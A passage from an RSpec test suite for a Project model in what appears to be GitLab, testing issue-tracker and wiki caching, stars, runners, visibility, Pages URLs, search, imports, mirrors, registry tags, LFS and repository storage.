ext_project.update_column(:has_external_issue_tracker, nil)
end
it 'updates the has_external_issue_tracker boolean' do
expect do
project.external_issue_tracker
end.to change { project.reload.has_external_issue_tracker }.to(false)
expect do
ext_project.external_issue_tracker
end.to change { ext_project.reload.has_external_issue_tracker }.to(true)
end
end
it 'returns nil and does not query services when there is no external issue tracker' do
expect(project).not_to receive(:services)
expect(project.external_issue_tracker).to eq(nil)
end
it 'retrieves external_issue_tracker querying services and cache it when there is external issue tracker' do
ext_project.reload # Factory returns a project with changed attributes
expect(ext_project).to receive(:services).once.and_call_original
2.times { expect(ext_project.external_issue_tracker).to be_a_kind_of(RedmineService) }
end
end
describe '#cache_has_external_issue_tracker' do
let(:project) { create(:project, has_external_issue_tracker: nil) }
it 'stores true if there is any external_issue_tracker' do
services = double(:service, external_issue_trackers: [RedmineService.new])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_issue_tracker
end.to change { project.has_external_issue_tracker}.to(true)
end
it 'stores false if there is no external_issue_tracker' do
services = double(:service, external_issue_trackers: [])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_issue_tracker
end.to change { project.has_external_issue_tracker}.to(false)
end
it 'does not cache data when in a read-only GitLab instance' do
allow(Gitlab::Database).to receive(:read_only?) { true }
expect do
project.cache_has_external_issue_tracker
end.not_to change { project.has_external_issue_tracker }
end
end
describe '#cache_has_external_wiki' do
let(:project) { create(:project, has_external_wiki: nil) }
it 'stores true if there is any external_wikis' do
services = double(:service, external_wikis: [ExternalWikiService.new])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_wiki
end.to change { project.has_external_wiki}.to(true)
end
it 'stores false if there is no external_wikis' do
services = double(:service, external_wikis: [])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_wiki
end.to change { project.has_external_wiki}.to(false)
end
it 'does not cache data when in a read-only GitLab instance' do
allow(Gitlab::Database).to receive(:read_only?) { true }
expect do
project.cache_has_external_wiki
end.not_to change { project.has_external_wiki }
end
end
describe '#has_wiki?' do
let(:no_wiki_project) { create(:project, :wiki_disabled, has_external_wiki: false) }
let(:wiki_enabled_project) { create(:project) }
let(:external_wiki_project) { create(:project, has_external_wiki: true) }
it 'returns true if project is wiki enabled or has external wiki' do
expect(wiki_enabled_project).to have_wiki
expect(external_wiki_project).to have_wiki
expect(no_wiki_project).not_to have_wiki
end
end
describe '#external_wiki' do
let(:project) { create(:project) }
context 'with an active external wiki' do
before do
create(:service, project: project, type: 'ExternalWikiService', active: true)
project.external_wiki
end
it 'sets :has_external_wiki as true' do
expect(project.has_external_wiki).to be(true)
end
it 'sets :has_external_wiki as false if an external wiki service is destroyed later' do
expect(project.has_external_wiki).to be(true)
project.services.external_wikis.first.destroy
expect(project.has_external_wiki).to be(false)
end
end
context 'with an inactive external wiki' do
before do
create(:service, project: project, type: 'ExternalWikiService', active: false)
end
it 'sets :has_external_wiki as false' do
expect(project.has_external_wiki).to be(false)
end
end
context 'with no external wiki' do
before do
project.external_wiki
end
it 'sets :has_external_wiki as false' do
expect(project.has_external_wiki).to be(false)
end
it 'sets :has_external_wiki as true if an external wiki service is created later' do
expect(project.has_external_wiki).to be(false)
create(:service, project: project, type: 'ExternalWikiService', active: true)
expect(project.has_external_wiki).to be(true)
end
end
end
describe '#star_count' do
it 'counts stars from multiple users' do
user1 = create(:user)
user2 = create(:user)
project = create(:project, :public)
expect(project.star_count).to eq(0)
user1.toggle_star(project)
expect(project.reload.star_count).to eq(1)
user2.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(2)
user1.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(1)
user2.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(0)
end
it 'counts stars on the right project' do
user = create(:user)
project1 = create(:project, :public)
project2 = create(:project, :public)
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
user.toggle_star(project1)
project1.reload
project2.reload
expect(project1.star_count).to eq(1)
expect(project2.star_count).to eq(0)
user.toggle_star(project1)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
user.toggle_star(project2)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(1)
user.toggle_star(project2)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
end
end
describe '#avatar_type' do
let(:project) { create(:project) }
it 'is true if avatar is image' do
project.update_attribute(:avatar, 'uploads/avatar.png')
expect(project.avatar_type).to be_truthy
end
it 'is false if avatar is html page' do
project.update_attribute(:avatar, 'uploads/avatar.html')
expect(project.avatar_type).to eq(['file format is not supported. Please try one of the following supported formats: png, jpg, jpeg, gif, bmp, tiff'])
end
end
describe '#avatar_url' do
subject { project.avatar_url }
let(:project) { create(:project) }
context 'when avatar file is uploaded' do
let(:project) { create(:project, :public, :with_avatar) }
it 'shows correct url' do
expect(project.avatar_url).to eq(project.avatar.url)
expect(project.avatar_url(only_path: false)).to eq([Gitlab.config.gitlab.url, project.avatar.url].join)
end
end
context 'when avatar file in git' do
before do
allow(project).to receive(:avatar_in_git) { true }
end
let(:avatar_path) { "/#{project.full_path}/avatar" }
it { is_expected.to eq "http://#{Gitlab.config.gitlab.host}#{avatar_path}" }
end
context 'when git repo is empty' do
let(:project) { create(:project) }
it { is_expected.to eq nil }
end
end
describe '#pipeline_for' do
let(:project) { create(:project, :repository) }
let!(:pipeline) { create_pipeline }
shared_examples 'giving the correct pipeline' do
it { is_expected.to eq(pipeline) }
context 'return latest' do
let!(:pipeline2) { create_pipeline }
it { is_expected.to eq(pipeline2) }
end
end
context 'with explicit sha' do
subject { project.pipeline_for('master', pipeline.sha) }
it_behaves_like 'giving the correct pipeline'
end
context 'with implicit sha' do
subject { project.pipeline_for('master') }
it_behaves_like 'giving the correct pipeline'
end
def create_pipeline
create(:ci_pipeline,
project: project,
ref: 'master',
sha: project.commit('master').sha)
end
end
describe '#builds_enabled' do
let(:project) { create(:project) }
subject { project.builds_enabled }
it { expect(project.builds_enabled?).to be_truthy }
end
describe '.with_shared_runners' do
subject { described_class.with_shared_runners }
context 'when shared runners are enabled for project' do
let!(:project) { create(:project, shared_runners_enabled: true) }
it "returns a project" do
is_expected.to eq([project])
end
end
context 'when shared runners are disabled for project' do
let!(:project) { create(:project, shared_runners_enabled: false) }
it "returns an empty array" do
is_expected.to be_empty
end
end
end
describe '.cached_count', :use_clean_rails_memory_store_caching do
let(:group) { create(:group, :public) }
let!(:project1) { create(:project, :public, group: group) }
let!(:project2) { create(:project, :public, group: group) }
it 'returns total project count' do
expect(described_class).to receive(:count).once.and_call_original
3.times do
expect(described_class.cached_count).to eq(2)
end
end
end
describe '.trending' do
let(:group) { create(:group, :public) }
let(:project1) { create(:project, :public, group: group) }
let(:project2) { create(:project, :public, group: group) }
before do
2.times do
create(:note_on_commit, project: project1)
end
create(:note_on_commit, project: project2)
TrendingProject.refresh!
end
subject { described_class.trending.to_a }
it 'sorts projects by the amount of notes in descending order' do
expect(subject).to eq([project1, project2])
end
it 'does not take system notes into account' do
10.times do
create(:note_on_commit, project: project2, system: true)
end
expect(described_class.trending.to_a).to eq([project1, project2])
end
end
describe '.starred_by' do
it 'returns only projects starred by the given user' do
user1 = create(:user)
user2 = create(:user)
project1 = create(:project)
project2 = create(:project)
create(:project)
user1.toggle_star(project1)
user2.toggle_star(project2)
expect(described_class.starred_by(user1)).to contain_exactly(project1)
end
end
describe '.visible_to_user' do
let!(:project) { create(:project, :private) }
let!(:user) { create(:user) }
subject { described_class.visible_to_user(user) }
describe 'when a user has access to a project' do
before do
project.add_user(user, Gitlab::Access::MASTER)
end
it { is_expected.to eq([project]) }
end
describe 'when a user does not have access to any projects' do
it { is_expected.to eq([]) }
end
end
context 'repository storage by default' do
let(:project) { build(:project) }
before do
storages = {
'default' => Gitlab::GitalyClient::StorageSettings.new('path' => 'tmp/tests/repositories'),
'picked' => Gitlab::GitalyClient::StorageSettings.new('path' => 'tmp/tests/repositories')
}
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
it 'picks storage from ApplicationSetting' do
expect_any_instance_of(ApplicationSetting).to receive(:pick_repository_storage).and_return('picked')
expect(project.repository_storage).to eq('picked')
end
end
context 'shared runners by default' do
let(:project) { create(:project) }
subject { project.shared_runners_enabled }
context 'are enabled' do
before do
stub_application_setting(shared_runners_enabled: true)
end
it { is_expected.to be_truthy }
end
context 'are disabled' do
before do
stub_application_setting(shared_runners_enabled: false)
end
it { is_expected.to be_falsey }
end
end
describe '#any_runners?' do
context 'shared runners' do
let(:project) { create(:project, shared_runners_enabled: shared_runners_enabled) }
let(:specific_runner) { create(:ci_runner, :project, projects: [project]) }
let(:shared_runner) { create(:ci_runner, :instance) }
context 'for shared runners disabled' do
let(:shared_runners_enabled) { false }
it 'has no runners available' do
expect(project.any_runners?).to be_falsey
end
it 'has a specific runner' do
specific_runner
expect(project.any_runners?).to be_truthy
end
it 'has a shared runner, but they are prohibited to use' do
shared_runner
expect(project.any_runners?).to be_falsey
end
it 'checks the presence of specific runner' do
specific_runner
expect(project.any_runners? { |runner| runner == specific_runner }).to be_truthy
end
it 'returns false if match cannot be found' do
specific_runner
expect(project.any_runners? { false }).to be_falsey
end
end
context 'for shared runners enabled' do
let(:shared_runners_enabled) { true }
it 'has a shared runner' do
shared_runner
expect(project.any_runners?).to be_truthy
end
it 'checks the presence of shared runner' do
shared_runner
expect(project.any_runners? { |runner| runner == shared_runner }).to be_truthy
end
it 'returns false if match cannot be found' do
shared_runner
expect(project.any_runners? { false }).to be_falsey
end
end
end
context 'group runners' do
let(:project) { create(:project, group_runners_enabled: group_runners_enabled) }
let(:group) { create(:group, projects: [project]) }
let(:group_runner) { create(:ci_runner, :group, groups: [group]) }
context 'for group runners disabled' do
let(:group_runners_enabled) { false }
it 'has no runners available' do
expect(project.any_runners?).to be_falsey
end
it 'has a group runner, but they are prohibited to use' do
group_runner
expect(project.any_runners?).to be_falsey
end
end
context 'for group runners enabled' do
let(:group_runners_enabled) { true }
it 'has a group runner' do
group_runner
expect(project.any_runners?).to be_truthy
end
it 'checks the presence of group runner' do
group_runner
expect(project.any_runners? { |runner| runner == group_runner }).to be_truthy
end
it 'returns false if match cannot be found' do
group_runner
expect(project.any_runners? { false }).to be_falsey
end
end
end
end
describe '#shared_runners' do
let!(:runner) { create(:ci_runner, :instance) }
subject { project.shared_runners }
context 'when shared runners are enabled for project' do
let!(:project) { create(:project, shared_runners_enabled: true) }
it "returns a list of shared runners" do
is_expected.to eq([runner])
end
end
context 'when shared runners are disabled for project' do
let!(:project) { create(:project, shared_runners_enabled: false) }
it "returns a empty list" do
is_expected.to be_empty
end
end
end
describe '#visibility_level_allowed?' do
let(:project) { create(:project, :internal) }
context 'when checking on non-forked project' do
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::PRIVATE)).to be_truthy }
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_truthy }
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_truthy }
end
context 'when checking on forked project' do
let(:project) { create(:project, :internal) }
let(:forked_project) { create(:project, forked_from_project: project) }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PRIVATE)).to be_truthy }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_truthy }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_falsey }
end
end
describe '#pages_deployed?' do
let(:project) { create(:project) }
subject { project.pages_deployed? }
context 'if public folder does exist' do
before do
allow(Dir).to receive(:exist?).with(project.public_pages_path).and_return(true)
end
it { is_expected.to be_truthy }
end
context "if public folder doesn't exist" do
it { is_expected.to be_falsey }
end
end
describe '#pages_url' do
let(:group) { create(:group, name: group_name) }
let(:project) { create(:project, namespace: group, name: project_name) }
let(:domain) { 'Example.com' }
subject { project.pages_url }
before do
allow(Settings.pages).to receive(:host).and_return(domain)
allow(Gitlab.config.pages).to receive(:url).and_return('http://example.com')
end
context 'group page' do
let(:group_name) { 'Group' }
let(:project_name) { 'group.example.com' }
it { is_expected.to eq("http://group.example.com") }
end
context 'project page' do
let(:group_name) { 'Group' }
let(:project_name) { 'Project' }
it { is_expected.to eq("http://group.example.com/project") }
end
end
describe '#pages_group_url' do
let(:group) { create(:group, name: group_name) }
let(:project) { create(:project, namespace: group, name: project_name) }
let(:domain) { 'Example.com' }
let(:port) { 1234 }
subject { project.pages_group_url }
before do
allow(Settings.pages).to receive(:host).and_return(domain)
allow(Gitlab.config.pages).to receive(:url).and_return("http://example.com:#{port}")
end
context 'group page' do
let(:group_name) { 'Group' }
let(:project_name) { 'group.example.com' }
it { is_expected.to eq("http://group.example.com:#{port}") }
end
context 'project page' do
let(:group_name) { 'Group' }
let(:project_name) { 'Project' }
it { is_expected.to eq("http://group.example.com:#{port}") }
end
end
describe '.search' do
let(:project) { create(:project, description: 'kitten mittens') }
it 'returns projects with a matching name' do
expect(described_class.search(project.name)).to eq([project])
end
it 'returns projects with a partially matching name' do
expect(described_class.search(project.name[0..2])).to eq([project])
end
it 'returns projects with a matching name regardless of the casing' do
expect(described_class.search(project.name.upcase)).to eq([project])
end
it 'returns projects with a matching description' do
expect(described_class.search(project.description)).to eq([project])
end
it 'returns projects with a partially matching description' do
expect(described_class.search('kitten')).to eq([project])
end
it 'returns projects with a matching description regardless of the casing' do
expect(described_class.search('KITTEN')).to eq([project])
end
it 'returns projects with a matching path' do
expect(described_class.search(project.path)).to eq([project])
end
it 'returns projects with a partially matching path' do
expect(described_class.search(project.path[0..2])).to eq([project])
end
it 'returns projects with a matching path regardless of the casing' do
expect(described_class.search(project.path.upcase)).to eq([project])
end
describe 'with pending_delete project' do
let(:pending_delete_project) { create(:project, pending_delete: true) }
it 'shows pending deletion project' do
search_result = described_class.search(pending_delete_project.name)
expect(search_result).to eq([pending_delete_project])
end
end
end
describe '#expire_caches_before_rename' do
let(:project) { create(:project, :repository) }
let(:repo) { double(:repo, exists?: true) }
let(:wiki) { double(:wiki, exists?: true) }
it 'expires the caches of the repository and wiki' do
allow(Repository).to receive(:new)
.with('foo', project)
.and_return(repo)
allow(Repository).to receive(:new)
.with('foo.wiki', project)
.and_return(wiki)
expect(repo).to receive(:before_delete)
expect(wiki).to receive(:before_delete)
project.expire_caches_before_rename('foo')
end
end
describe '.search_by_title' do
let(:project) { create(:project, name: 'kittens') }
it 'returns projects with a matching name' do
expect(described_class.search_by_title(project.name)).to eq([project])
end
it 'returns projects with a partially matching name' do
expect(described_class.search_by_title('kitten')).to eq([project])
end
it 'returns projects with a matching name regardless of the casing' do
expect(described_class.search_by_title('KITTENS')).to eq([project])
end
end
context 'when checking projects from groups' do
let(:private_group) { create(:group, visibility_level: 0) }
let(:internal_group) { create(:group, visibility_level: 10) }
let(:private_project) { create(:project, :private, group: private_group) }
let(:internal_project) { create(:project, :internal, group: internal_group) }
context 'when group is private project can not be internal' do
it { expect(private_project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_falsey }
end
context 'when group is internal project can not be public' do
it { expect(internal_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_falsey }
end
end
describe '#create_repository' do
let(:project) { create(:project, :repository) }
let(:shell) { Gitlab::Shell.new }
before do
allow(project).to receive(:gitlab_shell).and_return(shell)
end
context 'using a regular repository' do
it 'creates the repository' do
expect(shell).to receive(:create_repository)
.with(project.repository_storage, project.disk_path)
.and_return(true)
expect(project.repository).to receive(:after_create)
expect(project.create_repository).to eq(true)
end
it 'adds an error if the repository could not be created' do
expect(shell).to receive(:create_repository)
.with(project.repository_storage, project.disk_path)
.and_return(false)
expect(project.repository).not_to receive(:after_create)
expect(project.create_repository).to eq(false)
expect(project.errors).not_to be_empty
end
end
context 'using a forked repository' do
it 'does nothing' do
expect(project).to receive(:forked?).and_return(true)
expect(shell).not_to receive(:create_repository)
project.create_repository
end
end
end
describe '#ensure_repository' do
let(:project) { create(:project, :repository) }
let(:shell) { Gitlab::Shell.new }
before do
allow(project).to receive(:gitlab_shell).and_return(shell)
end
it 'creates the repository if it not exist' do
allow(project).to receive(:repository_exists?)
.and_return(false)
allow(shell).to receive(:create_repository)
.with(project.repository_storage, project.disk_path)
.and_return(true)
expect(project).to receive(:create_repository).with(force: true)
project.ensure_repository
end
it 'does not create the repository if it exists' do
allow(project).to receive(:repository_exists?)
.and_return(true)
expect(project).not_to receive(:create_repository)
project.ensure_repository
end
it 'creates the repository if it is a fork' do
expect(project).to receive(:forked?).and_return(true)
allow(project).to receive(:repository_exists?)
.and_return(false)
expect(shell).to receive(:create_repository)
.with(project.repository_storage, project.disk_path)
.and_return(true)
project.ensure_repository
end
end
describe 'handling import URL' do
context 'when project is a mirror' do
it 'returns the full URL' do
project = create(:project, :mirror, import_url: 'http://user:[email protected]')
project.import_finish
expect(project.reload.import_url).to eq('http://user:[email protected]')
end
end
context 'when project is not a mirror' do
it 'returns the sanitized URL' do
project = create(:project, :import_started, import_url: 'http://user:[email protected]')
project.import_finish
expect(project.reload.import_url).to eq('http://test.com')
end
end
end
describe '#container_registry_url' do
let(:project) { create(:project) }
subject { project.container_registry_url }
before do
stub_container_registry_config(**registry_settings)
end
context 'for enabled registry' do
let(:registry_settings) do
{ enabled: true,
host_port: 'example.com' }
end
it { is_expected.not_to be_nil }
end
context 'for disabled registry' do
let(:registry_settings) do
{ enabled: false }
end
it { is_expected.to be_nil }
end
end
describe '#has_container_registry_tags?' do
let(:project) { create(:project) }
context 'when container registry is enabled' do
before do
stub_container_registry_config(enabled: true)
end
context 'when tags are present for multi-level registries' do
before do
create(:container_repository, project: project, name: 'image')
stub_container_registry_tags(repository: /image/,
tags: %w[latest rc1])
end
it 'should have image tags' do
expect(project).to have_container_registry_tags
end
end
context 'when tags are present for root repository' do
before do
stub_container_registry_tags(repository: project.full_path,
tags: %w[latest rc1 pre1])
end
it 'should have image tags' do
expect(project).to have_container_registry_tags
end
end
context 'when there are no tags at all' do
before do
stub_container_registry_tags(repository: :any, tags: [])
end
it 'should not have image tags' do
expect(project).not_to have_container_registry_tags
end
end
end
context 'when container registry is disabled' do
before do
stub_container_registry_config(enabled: false)
end
it 'should not have image tags' do
expect(project).not_to have_container_registry_tags
end
it 'should not check root repository tags' do
expect(project).not_to receive(:full_path)
expect(project).not_to have_container_registry_tags
end
it 'should iterate through container repositories' do
expect(project).to receive(:container_repositories)
expect(project).not_to have_container_registry_tags
end
end
end
describe '#ci_config_path=' do
let(:project) { create(:project) }
it 'sets nil' do
project.update!(ci_config_path: nil)
expect(project.ci_config_path).to be_nil
end
it 'sets a string' do
project.update!(ci_config_path: 'foo/.gitlab_ci.yml')
expect(project.ci_config_path).to eq('foo/.gitlab_ci.yml')
end
it 'sets a string but removes all null characters' do
project.update!(ci_config_path: "f\0oo/\0/.gitlab_ci.yml")
expect(project.ci_config_path).to eq('foo//.gitlab_ci.yml')
end
end
describe 'Project import job' do
let(:project) { create(:project, import_url: generate(:url)) }
before do
allow_any_instance_of(Gitlab::Shell).to receive(:import_repository)
.with(project.repository_storage, project.disk_path, project.import_url)
.and_return(true)
expect_any_instance_of(Repository).to receive(:after_import)
.and_call_original
end
it 'imports a project' do
expect_any_instance_of(RepositoryImportWorker).to receive(:perform).and_call_original
expect { project.import_schedule }.to change { project.import_jid }
expect(project.reload.import_status).to eq('finished')
end
context 'with a mirrored project' do
let(:project) { create(:project, :mirror) }
it 'calls RepositoryImportWorker and inserts in front of the mirror scheduler queue' do
allow_any_instance_of(described_class).to receive(:repository_exists?).and_return(false, true)
expect_any_instance_of(EE::Project).to receive(:force_import_job!)
expect_any_instance_of(RepositoryImportWorker).to receive(:perform).with(project.id).and_call_original
expect { project.import_schedule }.to change { project.import_jid }
end
end
end
describe 'project import state transitions' do
context 'state transition: [:started] => [:finished]' do
let(:after_import_service) { spy(:after_import_service) }
let(:housekeeping_service) { spy(:housekeeping_service) }
before do
allow(Projects::AfterImportService)
.to receive(:new) { after_import_service }
allow(after_import_service)
.to receive(:execute) { housekeeping_service.execute }
allow(Projects::HousekeepingService)
.to receive(:new) { housekeeping_service }
end
it 'resets project import_error' do
error_message = 'Some error'
mirror = create(:project_empty_repo, :import_started)
mirror.import_state.update_attributes(last_error: error_message)
expect { mirror.import_finish }.to change { mirror.import_error }.from(error_message).to(nil)
end
it 'performs housekeeping when an import of a fresh project is completed' do
project = create(:project_empty_repo, :import_started, import_type: :github)
project.import_finish
expect(after_import_service).to have_received(:execute)
expect(housekeeping_service).to have_received(:execute)
end
it 'does not perform housekeeping when project repository does not exist' do
project = create(:project, :import_started, import_type: :github)
project.import_finish
expect(housekeeping_service).not_to have_received(:execute)
end
it 'does not perform housekeeping when project does not have a valid import type' do
project = create(:project, :import_started, import_type: nil)
project.import_finish
expect(housekeeping_service).not_to have_received(:execute)
end
end
end
describe '#latest_successful_builds_for' do
def create_pipeline(status = 'success')
create(:ci_pipeline, project: project,
sha: project.commit.sha,
ref: project.default_branch,
status: status)
end
def create_build(new_pipeline = pipeline, name = 'test')
create(:ci_build, :success, :artifacts,
pipeline: new_pipeline,
status: new_pipeline.status,
name: name)
end
let(:project) { create(:project, :repository) }
let(:pipeline) { create_pipeline }
context 'with many builds' do
it 'gives the latest builds from latest pipeline' do
pipeline1 = create_pipeline
pipeline2 = create_pipeline
build1_p2 = create_build(pipeline2, 'test')
create_build(pipeline1, 'test')
create_build(pipeline1, 'test2')
build2_p2 = create_build(pipeline2, 'test2')
latest_builds = project.latest_successful_builds_for
expect(latest_builds).to contain_exactly(build2_p2, build1_p2)
end
end
context 'with succeeded pipeline' do
let!(:build) { create_build }
context 'standalone pipeline' do
it 'returns builds for ref for default_branch' do
builds = project.latest_successful_builds_for
expect(builds).to contain_exactly(build)
end
it 'returns empty relation if the build cannot be found' do
builds = project.latest_successful_builds_for('TAIL')
expect(builds).to be_kind_of(ActiveRecord::Relation)
expect(builds).to be_empty
end
end
context 'with some pending pipeline' do
before do
create_build(create_pipeline('pending'))
end
it 'gives the latest build from latest pipeline' do
latest_build = project.latest_successful_builds_for
expect(latest_build).to contain_exactly(build)
end
end
end
context 'with pending pipeline' do
before do
pipeline.update(status: 'pending')
create_build(pipeline)
end
it 'returns empty relation' do
builds = project.latest_successful_builds_for
expect(builds).to be_kind_of(ActiveRecord::Relation)
expect(builds).to be_empty
end
end
end
describe '#add_import_job' do
let(:import_jid) { '123' }
context 'forked' do
let(:forked_project_link) { create(:forked_project_link, :forked_to_empty_project) }
let(:forked_from_project) { forked_project_link.forked_from_project }
let(:project) { forked_project_link.forked_to_project }
it 'schedules a RepositoryForkWorker job' do
expect(RepositoryForkWorker).to receive(:perform_async).with(project.id).and_return(import_jid)
expect(project.add_import_job).to eq(import_jid)
end
context 'without mirror' do
it 'returns nil' do
project = create(:project)
expect(project.add_import_job).to be nil
end
end
context 'without repository' do
it 'schedules RepositoryImportWorker' do
project = create(:project, import_url: generate(:url))
expect(RepositoryImportWorker).to receive(:perform_async).with(project.id).and_return(import_jid)
expect(project.add_import_job).to eq(import_jid)
end
end
context 'with mirror' do
it 'schedules RepositoryUpdateMirrorWorker' do
project = create(:project, :mirror, :repository)
expect(RepositoryUpdateMirrorWorker).to receive(:perform_async).with(project.id).and_return(import_jid)
expect(project.add_import_job).to eq(import_jid)
end
end
end
context 'not forked' do
it 'schedules a RepositoryImportWorker job' do
project = create(:project, import_url: generate(:url))
expect(RepositoryImportWorker).to receive(:perform_async).with(project.id).and_return(import_jid)
expect(project.add_import_job).to eq(import_jid)
end
end
end
describe '#gitlab_project_import?' do
subject(:project) { build(:project, import_type: 'gitlab_project') }
it { expect(project.gitlab_project_import?).to be true }
end
describe '#gitea_import?' do
subject(:project) { build(:project, import_type: 'gitea') }
it { expect(project.gitea_import?).to be true }
end
describe '#has_remote_mirror?' do
let(:project) { create(:project, :remote_mirror, :import_started) }
subject { project.has_remote_mirror? }
before do
allow_any_instance_of(RemoteMirror).to receive(:refresh_remote)
end
it 'returns true when a remote mirror is enabled' do
is_expected.to be_truthy
end
it 'returns false when remote mirror is disabled' do
project.remote_mirrors.first.update_attributes(enabled: false)
is_expected.to be_falsy
end
end
describe '#update_remote_mirrors' do
let(:project) { create(:project, :remote_mirror, :import_started) }
delegate :update_remote_mirrors, to: :project
before do
allow_any_instance_of(RemoteMirror).to receive(:refresh_remote)
end
it 'syncs enabled remote mirror' do
expect_any_instance_of(RemoteMirror).to receive(:sync)
update_remote_mirrors
end
it 'does nothing when remote mirror is disabled globally and not overridden' do
stub_application_setting(mirror_available: false)
project.remote_mirror_available_overridden = false
expect_any_instance_of(RemoteMirror).not_to receive(:sync)
update_remote_mirrors
end
it 'does not sync disabled remote mirrors' do
project.remote_mirrors.first.update_attributes(enabled: false)
expect_any_instance_of(RemoteMirror).not_to receive(:sync)
update_remote_mirrors
end
end
describe '#remote_mirror_available?' do
let(:project) { create(:project) }
context 'when remote mirror global setting is enabled' do
it 'returns true' do
expect(project.remote_mirror_available?).to be(true)
end
end
context 'when remote mirror global setting is disabled' do
before do
stub_application_setting(mirror_available: false)
end
it 'returns true when overridden' do
project.remote_mirror_available_overridden = true
expect(project.remote_mirror_available?).to be(true)
end
it 'returns false when not overridden' do
expect(project.remote_mirror_available?).to be(false)
end
end
end
describe '#ancestors_upto', :nested_groups do
let(:parent) { create(:group) }
let(:child) { create(:group, parent: parent) }
let(:child2) { create(:group, parent: child) }
let(:project) { create(:project, namespace: child2) }
it 'returns all ancestors when no namespace is given' do
expect(project.ancestors_upto).to contain_exactly(child2, child, parent)
end
it 'includes ancestors upto but excluding the given ancestor' do
expect(project.ancestors_upto(parent)).to contain_exactly(child2, child)
end
end
describe '#lfs_enabled?' do
let(:project) { create(:project) }
shared_examples 'project overrides group' do
it 'returns true when enabled in project' do
project.update_attribute(:lfs_enabled, true)
expect(project.lfs_enabled?).to be_truthy
end
it 'returns false when disabled in project' do
project.update_attribute(:lfs_enabled, false)
expect(project.lfs_enabled?).to be_falsey
end
it 'returns the value from the namespace, when no value is set in project' do
expect(project.lfs_enabled?).to eq(project.namespace.lfs_enabled?)
end
end
context 'LFS disabled in group' do
before do
project.namespace.update_attribute(:lfs_enabled, false)
enable_lfs
end
it_behaves_like 'project overrides group'
end
context 'LFS enabled in group' do
before do
project.namespace.update_attribute(:lfs_enabled, true)
enable_lfs
end
it_behaves_like 'project overrides group'
end
describe 'LFS disabled globally' do
shared_examples 'it always returns false' do
it do
expect(project.lfs_enabled?).to be_falsey
expect(project.namespace.lfs_enabled?).to be_falsey
end
end
context 'when no values are set' do
it_behaves_like 'it always returns false'
end
context 'when all values are set to true' do
before do
project.namespace.update_attribute(:lfs_enabled, true)
project.update_attribute(:lfs_enabled, true)
end
it_behaves_like 'it always returns false'
end
end
end
describe '.where_full_path_in' do
context 'without any paths' do
it 'returns an empty relation' do
expect(described_class.where_full_path_in([])).to eq([])
end
end
context 'without any valid paths' do
it 'returns an empty relation' do
expect(described_class.where_full_path_in(%w[foo])).to eq([])
end
end
context 'with valid paths' do
let!(:project1) { create(:project) }
let!(:project2) { create(:project) }
it 'returns the projects matching the paths' do
projects = described_class.where_full_path_in([project1.full_path,
project2.full_path])
expect(projects).to contain_exactly(project1, project2)
end
it 'returns projects regardless of the casing of paths' do
projects = described_class.where_full_path_in([project1.full_path.upcase,
project2.full_path.upcase])
expect(projects).to contain_exactly(project1, project2)
end
end
end
describe '#find_path_lock' do
let(:project) { create :project }
let(:path_lock) { create :path_lock, project: project }
let(:path) { path_lock.path }
it 'returns path_lock' do
expect(project.find_path_lock(path)).to eq(path_lock)
end
it 'returns nil' do
expect(project.find_path_lock('app/controllers')).to be_falsey
end
end
describe '#change_repository_storage' do
let(:project) { create(:project, :repository) }
let(:read_only_project) { create(:project, :repository, repository_read_only: true) }
before do
FileUtils.mkdir('tmp/tests/extra_storage')
stub_storage_settings('extra' => { 'path' => 'tmp/tests/extra_storage' })
end
after do
FileUtils.rm_rf('tmp/tests/extra_storage')
end
it 'schedule the transfer of the repository to the new storage and locks the project' do
expect(ProjectUpdateRepositoryStorageWorker).to receive(:perform_async).with(project.id, 'extra')
project.change_repository_storage('extra')
project.save
expect(project).to be_repository_read_only
end
it "doesn't schedule the transfer if the repository is already read-only" do
expect(ProjectUpdateRepositoryStorageWorker).not_to receive(:perform_async)
read_only_project.change_repository_storage('extra')
read_only_project.save
end
it "doesn't lock or schedule the transfer if the storage hasn't changed" do
expect(ProjectUpdateRepositoryStorageWorker).not_to receive(:perform_async)
project.change_repository_storage(project.repository_storage)
project.save
expect(project).not_to be_repository_read_only
end
it 'throws an error if an invalid repository storage is provided' do
expect { project.change_repository_storage('unknown') }.to raise_error(ArgumentError)
end
end
describe '#change_head' do
let(:project) { create(:project, :repository) }
it 'returns error if branch does not exist' do
expect(project.change_head('unexisted-branch')).to be false
expect(project.errors.size).to eq(1)
end
it 'calls the before_change_head and after_change_head methods' do
expect(project.repository).to receive(:before_change_head)
expect(project.repository).to receive(:after_change_head)
project.change_head(project.default_branch)
end
it 'creates the new reference with rugged' do
expect(project.repository.raw_repository).to receive(:write_ref).with('HEAD', "refs/heads/#{project.default_branch}", shell: false)
project.change_head(project.default_branch)
end
it 'copies the gitattributes' do
expect(project.repository).to receive(:copy_gitattributes).with(project.default_branch)
project.change_head(project.default_branch)
end
it 'reloads the default branch' do
expect(project).to receive(:reload_default_branch)
project.change_head(project.default_branch)
end
end
context 'forks' do
include ProjectForksHelper
let(:project) { create(:project, :public) }
let!(:forked_project) { fork_project(project) }
describe '#fork_network' do
it 'includes a fork of the project' do
expect(project.fork_network.projects).to include(forked_project)
end
